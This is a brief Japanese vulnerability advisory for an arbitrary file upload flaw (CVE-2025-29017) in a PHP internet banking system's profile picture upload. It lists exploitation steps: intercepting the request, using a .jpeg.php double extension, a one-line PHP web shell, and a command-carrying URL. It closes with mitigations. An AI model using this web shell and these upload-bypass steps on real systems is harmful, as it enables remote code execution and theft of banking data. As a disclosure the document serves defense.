CVE-2025-29017 - Internet Banking System 2.0.0 プロフィール画像アップロードによるリモートコード実行
説明
Code Astro Internet Banking System 2.0.0 には、pages_view_client.php 内の profile_pic パラメータにおける不適切なファイルアップロード検証により、リモートコード実行 (RCE) の脆弱性が存在します。攻撃者はアップロードリクエストを変更することでセキュリティチェックをバイパスし、任意のコード実行が可能になります。
影響を受けるコンポーネント
pages_view_client.php 内の profile_pic パラメータ
- アップロード機能により悪意のある PHP ファイルの実行が可能
悪用手順
- ユーザープロフィール設定に移動し、新しいプロフィール画像を選択します。


- Burp Suite などのツールを使用してプロフィール画像アップロードリクエストを傍受します。

- ファイルを二重拡張子 (.jpeg.php) に変更し、Content-Type ヘッダーを application/x-php に変更して、悪意のある PHP コードを追加します:
<?php system($_GET['cmd']); ?>


- ファイルが /admin/dist/img/ にアップロードされているか確認できます:
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

影響
緩和策
- ファイルアップロードを画像形式のみに制限し、MIME タイプを検証する。
- ファイル名をサニタイズし、実行可能コードを含むファイルをブロックする。
- アップロードされたファイルを Web ルートの外に保存する。
参照